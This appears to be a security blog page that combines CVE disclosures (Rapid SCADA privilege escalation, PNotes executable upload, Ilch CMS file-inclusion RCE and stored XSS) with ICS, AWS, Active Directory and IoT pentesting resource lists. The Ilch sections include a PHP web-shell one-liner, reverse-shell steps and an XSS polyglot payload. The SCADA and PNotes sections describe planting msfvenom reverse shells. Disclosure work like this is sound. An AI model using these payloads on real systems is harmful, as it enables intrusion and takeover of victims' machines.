[CVE-2020-22722] – Rapid SCADA Local Privilege Escalation Vulnerability

Product Owner: Rapid Software LLC

Type:  Installable/Customer-Controlled Application

Application Name: Rapid SCADA 5.8.0

Rapid SCADA is an open source industrial automation platform. The out of the box software provides tools for rapid creation of monitoring and control systems. In case of large implementation, Rapid SCADA is used as a core for development of custom SCADA and MES solutions for a Customer.

Open source is the key to software transparency and security. The licensing model permits creation of new derivative software products.

Rapid SCADA is a perfect choice for creating large distributed industrial automation systems. Rapid SCADA runs on servers, embedded computers and in the cloud. Rapid SCADA nodes exchange information between themselves, and interact with external databases in real time.

The main classes of systems developed using Rapid SCADA are the following:

  •  Industrial automation systems and IIoT systems.
  •  Process control systems.
  •  Energy accounting systems.

Product Url: https://rapidscada.org/

Download Url: https://rapidscada.org/download-all-files/download-rapid-scada/

Application Release Date: 2020-01-28

Severity: High

Authentication: Required

Complexity: Hard

Vulnerability Name: Rapid SCADA Local Privilege Escalation Vulnerability via ScadaAgentSvc.exe, ScadaCommSvc.exe

Vulnerability Explanation: Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Tested Os: Windows 10 Pro

Vulnerability Details:

Due to this COVID-19 outbreak, I was testing a lot of open source applications to learn new types of attacks and help our infosec community people to gain more awareness. So by googling I landed to this Rapid SCADA software which is free and it is used by a lot of people.

So installed the application and started with the basic enumeration process to check whether it has any service-related vulnerabilities.

I took a look at the application service just for curiosity and found that that there is no unquoted service path vulnerability.

ScadaAgentConfig.xml – Default directory location

Rapid Scada 5.8.0 Default installation directory

I had a look at the folder permissions of the “C:\ SCADA” folder and Wow! It had been set to “BUILDIN\Users:(OI)(CI)” which means any user can read, write, execute, create, delete do anything inside that folder and it’s subfolders. The ACL rules had OI – Object Inherit and CI – Container Inherit which means all the files in this folder and subfolders have full permissions.

Since “ScadaAgentSvc.exe” executable is a Windows service, by planting a malicious program with the same name “ScadaAgentSvc.exe” would result in executing the binary as “NT AUTHORITY\SYSTEM” giving highest privileges in a Windows operating system.

This vulnerability can be used to escalate privileges in a Windows operating system locally. For example, an attacker can plant a reverse shell from a low privileged user account and by restarting the computer, the malicious service will be started as “NT AUTHORITY\SYSTEM” by giving the attacker full system access to the remote PC.

Creating a malicious payload using msfvenom

Transfer to the victim system

Rename the service Exe with payload Exe

Restart the victim and you will gain shell access:

Note: We gain shell access before syh4ck user logging into to the system.

Syh4ck Normal User Lock screen – after restart

Gaining Admin Shell with from User machine

The following video POC demo – how this issue can be used to escalate privileges and gain a remote shell running as “NT AUTHORITY\SYSTEM”.

RapidScada 5.8 Local Priv POC

Vendor Status:

[21.04.2020] Vulnerability discovered.
[21.04.2020] Vendor contacted.

[24.04.2020] Vendor Acknowledged

[25.04.2020] Applied for CVE

[14-08-2020]- CVE Assigned – CVE-2020-22722




Email– mr.anandmurugan@gmail.com

Twitter – https://twitter.com/syh4ck

[CVE-2020-22721]- Pnotes Insecure .exe File Upload Vulnerability – code execution

Product Owner: PNotes – Andrey Gruber © 2007 – 2020

Type:  Installable/Customer-Controlled Application

Application Name: PNotesNET version

Managing your day-to-day life is not an easy job to do. There are so many things for concern – housekeeping, shopping, children… And what about cousin’s birthday that you always forget or important phone numbers? Undoubtedly your working place is covered with dusty yellow (or blue, or pink) sticky notes. If so – PNotes is right for you. Throw the physical stickies away and replace them with virtual ones on your desktop.

PNotes (Pinned Notes or Portable Notes, use what you prefer) exists in two different editions:

  • PNotes – the older one, written entirely in plain C and Windows API (with Pelles C for Windows IDE)
  • PNotes.NET – the newer one, written in C#, requires .NET Framework 4.5

Product Url: https://pnotes-1932d.firebaseapp.com/home

Download Url:  https://sourceforge.net/projects/pnotes/files/PNotes.NET/Bin/PNotesNET3812Setup.exe/download

Application Release Date: 04 May 2019

Severity: High

Authentication: Required

Complexity: Medium

Vulnerability Name: Pnotes Insecure File Upload Vulnerability using (Miscellaneous – External Programs) and arbitrary code execution

Vulnerability Explanation: Pnotes is manily used for taking notes, especially a third party open source application. We can upload malicious .exe file via Miscellaneous – External programs and perform code execution via command line access.

PNotes Documentation – about External Programs use

Tested Os: Windows 10 Pro

Vulnerability Details:

Creating a malicious payload using msfvenom

Using Msfvenom we create malicious .exe file to upload

Transfer Malocious implant .exe file – Pnshell.exe to victim system :

Pnshell Upload in Miscellaneous – External programs

Uploading implant .Exe file
Click Run to Execute the external program – PnotesShell

Code Execution using Pnshell.exe :

Command Line Access:

Pnotes Revershell

Vendor Status:

[18.04.2020] Vulnerability discovered.
[18.04.2020] Vendor contacted.

[19.04.2020] CVE applied

[14.08.2020] CVE Assigned – CVE-2020-22721





Email– mr.anandmurugan@gmail.com


Useful industrial-control-system-security websites & data’s


CSETThe Cyber Security Evaluation Tool (CSET®) assists organizations in protecting their key national cyber assets. This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks. It includes both high-level and detailed questions related to all industrial control and IT systems.​
Digital Bond’s 3S CoDeSys ToolsDigital Bond created three tools for interacting with PLCs that run CoDeSys, consisting of a command shell, file transfer and NMap script.
Digital Bond’s ICS Enumeration ToolsRedpoint is a Digital Bond research project to enumerate ICS applications and devices using nmap extensions. It can be used during assessments to discover ICS devices and pull information that would be helpful in secondary testing. The Redpoint tools use legitimate protocol or application commands to discover and enumerate devices and applications. There is no effort to exploit or crash anything, but be wise and careful.
GRASSMARLINGRASSMARLIN provides IP network situational awareness of industrial control systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks to support network security. Passively map, and visually display, an ICS/SCADA network topology while safely conducting device discovery, accounting, and reporting on these critical cyber-physical systems.
ics_mem_collectMemory collector for GE D20MX. The project itself can be extended to work with other devices.
ISFThe Industrial Exploitation Framework (ISF) is an exploitation framework similar to Metasploit written in Python. It is based on the open source Routersploit tool. It contains exploits for several types of controllers, such as QNX, Siemens and Schneider devices and includes several scanners.
ISEFThe Industrial Security Exploitation Framework (ISEF) is an exploitation framework based on the Equation Group Fuzzbunch toolkit as released by Shadow Brokers. It’s developed by the ICSMASTER Security Team.
ꓘamerka GUIUltimate Internet of Things/Industrial Control Systems reconnaissance tool.
mbtgetmbtget – Simple perl script for make some modbus transaction from the command line.
MiniCPSMiniCPS: A toolkit for security research on Cyber-Physical Systems from Singapore University of Technology and Design (SUTD).
MODBUS Penetration Testing Frameworksmod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. The framework can be used to perform vulnerability assessments.
ModbusPalModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy to use interface with the capabilities to reproduce complex and realistic MODBUS environments.
ModScanModScan is a new tool designed to map a SCADA MODBUS TCP based network.
NetToPLCSimTCP/IP-Network extension for the PLC simulation software Siemens PLCSim.
Opendnp3Opendnp3 is the de facto reference implementation of IEEE-1815 (DNP3) provided under the Apache License.
PLCinjectPLCinject can be used to inject code into PLCs.
plcscanTool for scaning PLC devices over the s7comm or modbus protocol.
Quickdraw IDSThe Quickdraw IDS project by Digital Bond includes Snort rules for SCADA devices and so-called preprocessors for network traffic. The preprocessors provide significant additional value because of their ability to reconstruct the protocol and state for use by Snort.
S7Comm-AnalyzerA plugin for Bro that parses S7comm protocol data traffic.
SCADAShutdownToolSCADAShutdownTool is an industrial control system automation and testing tool allows security researchers and experts to test SCADA security systems, enumerate slave controllers, read controller’s registers values and rewrite registers data.
sixnet-toolsTool for exploiting Sixnet RTUs. This simple command line interface allows using undocumented function codes to gain root access anc control the underlying Linux OS on certain Sixnet family industrial control devices.
Snap7Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens S7 PLCs. The new CPUs 1200/1500, the old S7200, the small LOGO 0BA7/0BA8 and SINAMICS Drives are also partially supported.
s7scanA tool written in Python that scans networks, enumerates Siemens PLCs and gathers basic information about them, such as PLC firmware and hardware version, network configuration and security parameters.
S7 Password BruteforcerA tool to bruteforce the password used by S7 instances from a PCAP using a dictionary. Original created by SCADAStrangelove.
sploneboxsplonebox is an open source network assessment tool with focus on modularity. It offers an ongoing analysis of a network and its devices. One major design decision features development of custom plugins, including ones for industrial communication protocols.
WiresharkWireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. It has support for many protocols used in ICS.


Moki LinuxMoki is a modification of Kali to encorporate various ICS/SCADA Tools scattered around the internet, to create a customized Kali Linux geared towards ICS/SCADA pentesting professionals.
SamuraiSTFUSamuraiSTFU takes the best in breed security tools for traditional network and web penetration testing, adds specialized tools for embedded and RF testing, and mixes in a healthy dose of energy sector context, documentation, and sample files, including emulators for SCADA, Smart Meters, and other types of energy sector systems to provide leverage a full test lab.
ControlThings PlatformThe ControlThings Platform is an open source linux distribution for ICS cyber security teams. It takes the best-in-breed security assessment tools for traditional IT infrastructures and adds specialized tools for embedded electronics, proprietary wireless, and a healthy dose of ICS specific assessment tools, both from the community and custom tools created by the ControlThings I/O teams.


ConpotConpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend. It features easy customization and and behaviour mimicking, amongst others, and can be extended with real HMIs. Built and maintained under the Honeynet project.
GasPotGasPot is a honeypot that has been designed to simulate a Veeder Root Gaurdian AST. These Tank Gauges are common in the oil and gas industry for Gas Station tanks to help with Inventory of fuels. GasPot was designed to randomize as much as possible so no two instances look exactly the same.
T-PotT-Pot is a combination of several honeypots that run in docker containers. Suricata and the ELK stack are used for security monitoring and visualization. Amongst others, it features Conpot and eMobility, which are an ICS and next generation transport infrastructure honeypots.


4SICS ICS Lab PCAPSThe “Geek Lounge” at 4SICS contains an ICS lab with PLCs, RTUs, servers, industrial network equipment (switches, firewalls, etc). These devices are available for hands-on “testing” by 4SICS attendees and traffic has been captured from these.
DEF CON 23 ICS Village PCAPSPCAPS from the 23rd DEF CON.
ICS MapA map created from data gathered by Shodan showing ICS devices. Data is made available for further analysis.
ICS PCAP Collection by Jason SmithA collection of PCAPs for various ICS utilities and protocols.
ICS RadarData gathered from several types of ICS protocols by Shodan visualized on a globe.
S4x15 ICS VillageMirror for the PCAPS from the S4x15 CTF as used during the contest.
S7 PCAP samplesSample files for Wireshark S7 protocol dissector plugin.
SCADAPASSThe famous SCADA StrangeLove Default/Hardcoded Passwords List.
TRISIS/TRITON/HATMAN malware repositoryRepository containting original and decompiled files of TRISIS/TRITON/HATMAN malware targeting Triconex Safety Instrumented System (SIS) controllers.

Feeds and News

ICS-CERT AlertsThe ICS-CERT Alert feed is intended to provide timely notification to critical infrastructure owners and operators concerning threats or activity with the potential to impact critical infrastructure computing networks.
ICS-CERT RSS FeedThe RSS feed by the United States ICS-CERT lists news and newly released vulnerability advisories.
Industrial Security AlertsSiemens provides alerts for its industrial systems via this page and RSS feed.
North American Electric Reliability Corporation (NERC) AlertsNERC provides alerts for Bulk Electric System (BES) security advisories and industry recommendations.
ABB Cybersecurity Alerts and NotificationsABB provides alerts for its cyber security incidents and software vulnerabilities.
Schneider Electric Cybersecurity Alerts and NotificationsGet the latest updates and alerts on Cyber Security and Compliance from Schneider Electric Software.

Conferences and Conference Material

CS3STHLMthe Stockholm international summit on Cyber Security in SCADA and Industrial Control Systems – is an annual summit that gather the most important stakeholders across critical processes and industries. CS3STHLM has been organized since 2014, and has quickly become the premier ICS Security Summit in Northern Europe.
CS4CACyber Security for Critical Assets is a global series of summits focusing on cyber security for critical infrastructure.
SANS ICS Summit ArchivesCentral repository for the presentation material for the SANS ICS Summits held worldwide.
SANS ICS Cybersecurity Conference (WeissCon)Affectionately known as WeissCon after it’s founder Joe Weiss, the conference is now owned and operated by SecurityWeek and usually runs in October at different locations each year in the US.


ATT&CK® for Industrial Control Systems by MITREATT&CK for ICS is a knowledge base useful for describing the actions an adversary may take while operating within an ICS network.
Library of Resources for Industrial Control System Cyber SecuritySCADAhacker.com’s ultimate list of ICS/SCADA cybersecurity resources.
Applied Cyber Security and the Smart GridApplied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure by Eric D. Knapp and Raj Samani.
A Collection of Resources for Getting Started in ICS/SCADA CybersecurityRobert M. Lee’s thoughts on some good resources on ICS & SCADA security.
Hacker Machine Interface – The State of SCADA HMI VulnerabilitiesA TrendLabs Research Paper from the Trend Micro Zero Day Initiative Team about the current state of SCADA and HMI security.
Handbook of SCADA/Control Systems SecurityThis comprehensive handbook covers fundamental security concepts, methodologies, and relevant information pertaining to supervisory control and data acquisition (SCADA) and other industrial control systems used in utility and industrial facilities worldwide.
SCADA Cybersecurity FrameworkPaper describing what a SCADA Cyber Security framework should consist of.
Industrial Network Security, Second EditionIndustrial Network Security, Second Edition: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp and Joel Thomas Langill.
Power System SCADA and Smart GridsThe book brings together in one concise volume the fundamentals and possible application functions of power system supervisory control and data acquisition (SCADA). Not security-oriented and geared towards power systems, but a good primer into SCADA nonetheless.
NIST SP 800-82, Revision 2Guide to Industrial Control Systems (ICS) Security by NIST.
The Industrial Control System Cyber Kill ChainThis SANS paper describes the ICS Cyber Kill Chain. It tailors the Lockheed Martin Kill Chain to typical, two phase attacks on ICS systems.
An Abbreviated History of Automation, Industrial Control Systems, and CybersecurityThis SANS paper looks at the background on ICS cybersecurity. Well worth the read to make sure you understand many of the events that have occurred over the past twenty years and how they’ve inspired security in ICS today.
Control Engineering – Networking and Security – CyberSecurityControl Engineering magazine’s cybersecurity news and literature.
Operational Technology Cyber Security Incidents Ontology (OT-CSIO)OT-CSIO, created by FireEye, is an ontology to understand, cross-compare and assess cyber security incidents related to operational technology. It provides guidance for assessing risks and helps making informed decisions.
CIS Controls Implementation Guide for Industrial Control Systems – Version 7This document provides guidance on how to apply the security best practices found in CIS Controls Version 7.1 to ICS environments.
CIS Controls Internet of Things Companion Guide – Version 7.1The objective of this document is to have broad applicability across sectors. IoT affects all areas of computingacross multiple sectors, such as healthcare, aviation, public safety, and energy. This has led to sector-specific IoT security guidance, but this document is purposefully sector-agnostic.


LICSTERLICSTER, the Low-cost ICS Security Testbed for Education and Research, aims to help setup a minimal, low-cost Industrial Control System (ICS) testbest for students, researchers, or anyone with an interest in industrial security. The project contains a list of affordable hardware to build the minimalistic ICS with, instructions, configurations and installation scripts to instantiate the system as well as various attacker scenarios and their implications. The paper can be found here.        

Introduction to ICS, SCADA, & PLCs

PLC Training OrgSite organizes all essential topics related to PLC training up to SCADA systems. While security is interwoven within the 10 learning phases, this is a great security article on the site for those just starting out.        
Control System BasicsYouTube video explaining control system basics including the type of logic these systems use to sense and create physical changes to take action upon.        
SCADA Systems – Utility 101 Session with Rusty WiliiamsUtility industry professional Rusty Williams explains SCADA from an electric utility perspective.        
Control System LecturesBrian Douglas YouTube video series where he covers a wide range of topics on control systems in a very easy to process way.        
The PLC ProfessorThe PLC Professor and his website plcprofessor.com contains a lot of great resources for learning what programmable logic controllers (PLCs) and other types of control systems and their logic are and how they work.        
Serial Communications RS232 and RS485John Rinaldi of Real Time Automation describes Serial communications RS232 and RS485.        
All You Need To Know About MODBUS-RTUJohn Rinaldi of Real Time Automation describes MODBUS-RTU.        
MODBUS Data StructuresJohn Rinaldi of Real Time Automation describes MODBUS data structures.        
All You Need to Know About MODBUS-TCPJohn Rinaldi of Real Time Automation describes MODBUS-TCP.        
How Ethernet TCP/IP is Used by Industrial ProtocolsJohn Rinaldi of Real Time Automation describes Ethernet TCP/IP.        
GRFICSGraphical Realism Framework for Industrial Control Simulations (GRFICS) is a framework for realistic industrial control simulations that uses Unity 3D game engine for simulating industrial control systems. GRFICS provides users with a full virtual industrial control system (ICS) network to practice common attacks including command injection, man-in-the-middle, and buffer overflows, and visually see the impact of their attacks in the 3D visualization. Users can also practice their defensive skills by properly segmenting the network with strong firewall rules, or writing intrusion detection rules.        
RealParsThe RealPars YouTube channel has many videos on industrial automation and PLC programming.        

AWS Cloud Penetration Testing Test Cases

  • Test for Unauthenticated Bucket Access
  • Test for Semi-Public Bucket access – Improper ACL permission
  • Targeting and compromising AWS Access keys in git commit
  • Test for Extracting keys from an EC2 instance
  • Exploiting AWS Security Misconfigurations
  • Testing to exploit EC2 instance
  • Exploiting Internal AWS Services using Lambda backdoors
  • Test for Subdomain Takeover
  • Testing for AWS iam Privilege Escalation
  • Test for RCE attack
  • Test for AWS Role Enumeration (IAM)
  • Test for EC2 service to exploit privilege escalation
  • Test for AWS Iam enumeration: Bypassing CloudTrail Logging
  • Test for BitBuckted Server data for credentials in AWS
  • DNS rebinding to compromise the cloud environment
  • Test for Change of local windows / Linux logs
  • Test to Create jobs or serverless actions to add root certificates and ssh private keys to machines and users (such as AWS lambda)
  • Test to Create an additional interface / assign an IP address in target network / subnet on a compromised machine (like assigning a secondary private IPv4 address or interface to an AWS EC2 instance
  • Steal virtual machine images from storage accounts, analyze them for passwords, keys and certificates to access live systems (like VM VHD snapshots from storage accounts)
  • Test to Gain OS level access to Instances/VMs via workload management service privileges (AWS SSM)
  • Create systems management commands or abuse instance metadata for scheduled and triggered command and control (AWS systems manager, modify EC2 User Data to trigger a reverse shell)
  • Test to Run or deploy a workload with an assigned/passed service or role, export instance credentials for those privileges (such as EC2 passed role and meta credentials)
  • Fingerprint server and application versions and frameworks, detect sensitive PII in application logs
  • Test for CSV injection in AWS CloudTrail
  • Tested for AWS secrets accessible via meta-data
  • Attempt load balancer MiTM for session hijacking (elb) by cloud service configuration or load balancer instance compromise
  • Steal credentials from metadata of proxy or http forwarding servers (credentials in AWS meta
  • Steal cloud workload credentials (AWS metadata sts or Azure Linux Agent (waagent) folder credentials)
  • Steal credentials from or leverage privilege to operation of a cloud key service (aws kms, azure key vault
  • Alter data in datastore for fraudulent transactions or static website compromise (s3, rds, redshift)
  • Alter a serverless function, logic app or otherwise a business logic implementation for action on objective or escalation (AWS lambda or Azure logic apps)
  • Alter data in local sql or mysql databases
  • Operate in regions where logging is not enabled or disable global logging (like CloudTrail)
  • Alter log files in a non-validated log store or disable validation (like cloud trail log validation)
  • Tesed for Disable network traffic analysis / logging (VPC flowlogs)
  • Tesed for Disable cloud alerting to prevent detection and response (like cloudwatch alerts, GuardDuty, Security Hub, or Azure Security Center)
  • Tesed for Disable data store access logging to prevent detection and response (cloudtrain data access, s3 access logging, redshift user activity)
  • Alter log retention or damage the integrity of logs (s3 lifecycle, kms decryption cmk key deletion/role privilege lockout)
  • Process hooking, process injection, windows access token manipulation, leveraging misconfigured sudo capabilities
  • Test to Create or reset a login, access key or temporary credential belonging to a high privilege user (like iam:CreateAccessKey, sts or iam:UpdateLoginProfile)
  • Test to Change the default policy for a user or new users to include additional privileges (like setdefault-policy-version)

Active Directory Kill Chain Attack 101

Attack active directory using modern post exploitation adversary trade craft activity


SPN Scanning

Data Mining

User Hunting




Active Directory Federation Services

Privilege Escalation

Passwords in SYSVOL & Group Policy Preferences

MS14-068 Kerberos Vulnerability


Kerberos Delegation

Unconstrained Delegation

Constrained Delegation

Resource-Based Constrained Delegation

Insecure Group Policy Object Permission Rights

Insecure ACLs Permission Rights

Domain Trusts



Microsoft SQL Server

Red Forest



Lateral Movement

Microsoft SQL Server Database links

Pass The Hash

System Center Configuration Manager (SCCM)


Password Spraying

Automated Lateral Movement

Defense Evasion

In-Memory Evasion

Endpoint Detection and Response (EDR) Evasion


Microsoft ATA & ATP Evasion

PowerShell ScriptBlock Logging Bypass

PowerShell Anti-Malware Scan Interface (AMSI) Bypass

Loading .NET Assemblies Anti-Malware Scan Interface (AMSI) Bypass

AppLocker & Device Guard Bypass

Sysmon Evasion

HoneyTokens Evasion

Disabling Security Tools

Credential Dumping

NTDS.DIT Password Extraction

SAM (Security Accounts Manager)


Kerberos AP-REP Roasting

Windows Credential Manager/Vault


LLMNR/NBT-NS Poisoning



Golden Ticket

SID History

Silver Ticket



Group Policy Object

Skeleton Keys


Security Support Provider

Directory Services Restore Mode

ACLs & Security Descriptors

Tools & Scripts

  • PowerView – Situational Awareness PowerShell framework
  • BloodHound – Six Degrees of Domain Admin
  • Impacket – Impacket is a collection of Python classes for working with network protocols
  • aclpwn.py – Active Directory ACL exploitation with BloodHound
  • CrackMapExec – A swiss army knife for pentesting networks
  • ADACLScanner – A tool with GUI or command linte used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory
  • zBang – zBang is a risk assessment tool that detects potential privileged account threats
  • SafetyKatz – SafetyKatz is a combination of slightly modified version of @gentilkiwi’s Mimikatz project and @subTee’s .NET PE Loader.
  • SharpDump – SharpDump is a C# port of PowerSploit’s Out-Minidump.ps1 functionality.
  • PowerUpSQL – A PowerShell Toolkit for Attacking SQL Server
  • Rubeus – Rubeus is a C# toolset for raw Kerberos interaction and abuses
  • ADRecon – A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment
  • Mimikatz – Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets
  • Grouper – A PowerShell script for helping to find vulnerable settings in AD Group Policy.
  • Powermad – PowerShell MachineAccountQuota and DNS exploit tools
  • RACE – RACE is a PowerShell module for executing ACL attacks against Windows targets.
  • DomainPasswordSpray – DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.
  • MailSniper – MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.)
  • LAPSToolkit – Tool to audit and attack LAPS environments.
  • CredDefense – Credential and Red Teaming Defense for Windows Environments


Cheat Sheets

Other Resources

[CVE-2019-17046] Ilch – Content Management System V – 2.1.22 Insecure File Upload, LFI & Remote Code Execution Critical Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID – CVE-2019-17046 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17046 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS 2.1.22

Severity: Critical

Authentication: Required

Complexity: Complex

Vulnerability Name: Insecure File upload and Local file inclusion to remote code execution – Ilch CMS Admin Modules

Vulnerability Explanation: 

Browsers Verified In:

Firefox 68.0.2 (64-bit)


Local File Inclusion – aka LFI – is one of the most common Web Application vulnerabilities. If conducted successfully, It might allow attackers to read sensitive information, access configuration files or even execute system commands remotely.

An application is vulnerable every time a developer uses the include functions, with an input provided by a user, without validating it. An attacker could easily exploit such a mistake. The main goals of the attacker would be:

  • An in depth information gathering (user enumeration, sensitive files, credentials and more).
  • A reverse shell to the target machine.

Log Poisoning:

Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.

As the PHP statement “include” also evaluates the input, an inclusion of a malformed file would be evaluated too. If we control the contents of a file available on the vulnerable web application, we could insert PHP code and load the file over the LFI vulnerability to execute our code.Such injections were taking place over the server log files. Such files are the Apache error log, the Access log and more.

Php info:

As shown, we were able to load the PHPInfo file, meaning that our code was executed. Let’s now attempt to execute the proper commands and receive a reverse shell from the target machine.

For the following Php-oneliner payload to execute system commands:

<?php echo shell_exec($_GET[‘e’].’ 2>&1′); ?>

LFI: Local File Inclusion using insecure file upload

Insecure file upload – Allows to add .php extension in the allowed file section (Media module -> settings -> Allowed File -> php

url : http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index


url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=whoami


url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=ipconfig

Reverse shell:    

Using netcat we can gain reverse shell payload.

Revershell payload used:

Payload – https://github.com/Dhayalanb/windows-php-reverse-shell.git

Remote Code Execution: Remote code execution is the ability an attacker has to access someone else’s computing device and make changes, no matter where the device is geographically located

By listening on port 1234 we can see that a Admin shell has been received.

Affected url :




InSecure File to LFI to RCE – Ilch CMS – V 2.1.22

Twitter – https://twitter.com/the_pr0fess0r_

NickName: 4n4nd

[CVE-2019-17045] Ilch – Content Management System V – 2.1.22 Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS – 2.1.22 02/01/22

Application Release Date: 23.05.2019

Severity: High

Authentication: Required

Complexity: Easy

Vulnerability Name: Stored Cross-site scripting – XSS Polyglot (Stored)

Vulnerability Explanation:  An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Anatomy of the polyglot

  • jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
  • /*-/*`/*\`/*’/*”/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
  • (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
  • //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
  • </stYle/</titLe/</teXtarEa/</scRipt/–!>: A sneaky HTML-tag-breaker sequence.
  • \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element.


Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page. Reflected cross-site scripting relies on a victim being socially engineered into clicking on a malicious link, sent via email for example.

Proof of Concept:  (Stored Cross site scripting – XSS Polyglot (Stored))

Affected items: ilchCMS  2.1.22

Step 1: Host the application using local web server xampp, install the Ilch CMS as per documentation.

Step 2: Go to admin panel

Step 3: Click Modules Tab

Step 4: Under the modules click Jobs Tab

Step 5: Enter the payload in all input field such as title, text, email id

Step 6: Finally click Add – Stored XSS will reflect back on the browser, even after refresh the stored XSS will reflect again.

Xss Payload used :

Html Comment:


jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e


Url: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat


Website: https://www.ilch.de/

Download Version: https://www.ilch.de/downloads-show-1826.html

Video POC:

Twitter – https://twitter.com/the_pr0fess0r_

OWASP API Security Top 10 2019

OWASP API Security Top 10 – 2019

A1Broken Object Level AuthorizationAPIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.
A2Broken AuthenticationAuthentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user’s identities temporarily or permanently. Compromising system’s ability to identify the client/user, compromises API security overall.
A3Excessive Data ExposureLooking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client’s state, servers receive more-and-more filters which can be abused to gain access to sensitive data.
A4Lack of Resources & Rate LimitingQuite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.
A5Broken Function Level AuthorizationComplex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.
A6Mass AssignmentBinding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.
A7Security MisconfigurationSecurity misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.
A8InjectionInjection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
A9Improper Assets ManagementAPIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.
A10Insufficient Logging & MonitoringInsufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

IoT Pentesting – Approach & Methods

IoT Methodology

  1. Network
  2. Web (Front & Backend and Web services)
  3. Mobile App(Android & iOS)
  4. Wireless Connectivity
  5. Firmware Pentesting(Hardware or IoT device OS)
  6. Hardware Level Approach
  7. Storage Areas

Important Websites you should know 

  1. https://blog.exploitee.rs/2018/10/
  2. https://www.exploitee.rs/
  3. https://forum.exploitee.rs/
  4. Your Lenovo Watch X Is Watching You & Sharing What It Learns
  5. Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT
  6. Smart Bulb Offers Light, Color, Music, and… Data Exfiltration?
  7. Besder-IPCamera analysis
  8. Smart Lock

IoT Security Group



  1. http://iotpentest.com/
  2. https://blog.attify.com
  3. https://payatu.com/blog/
  4. http://jcjc-dev.com/
  5. https://w00tsec.blogspot.in/
  6. http://www.devttys0.com/
  7. https://www.rtl-sdr.com/
  8. https://keenlab.tencent.com/en/
  9. https://courk.cc/
  10. https://iotsecuritywiki.com/
  11. https://cybergibbons.com/
  12. http://firmware.re/
  13. https://iotmyway.wordpress.com/
  14. http://blog.k3170makan.com/
  15. https://blog.tclaverie.eu/
  16. http://blog.besimaltinok.com/category/iot-pentest/
  17. https://ctrlu.net/
  18. https://duo.com/decipher/
  19. http://www.sp3ctr3.me
  20. http://blog.0x42424242.in/
  21. https://dantheiotman.com/
  22. https://blog.danman.eu/

Nmap CheatSheet

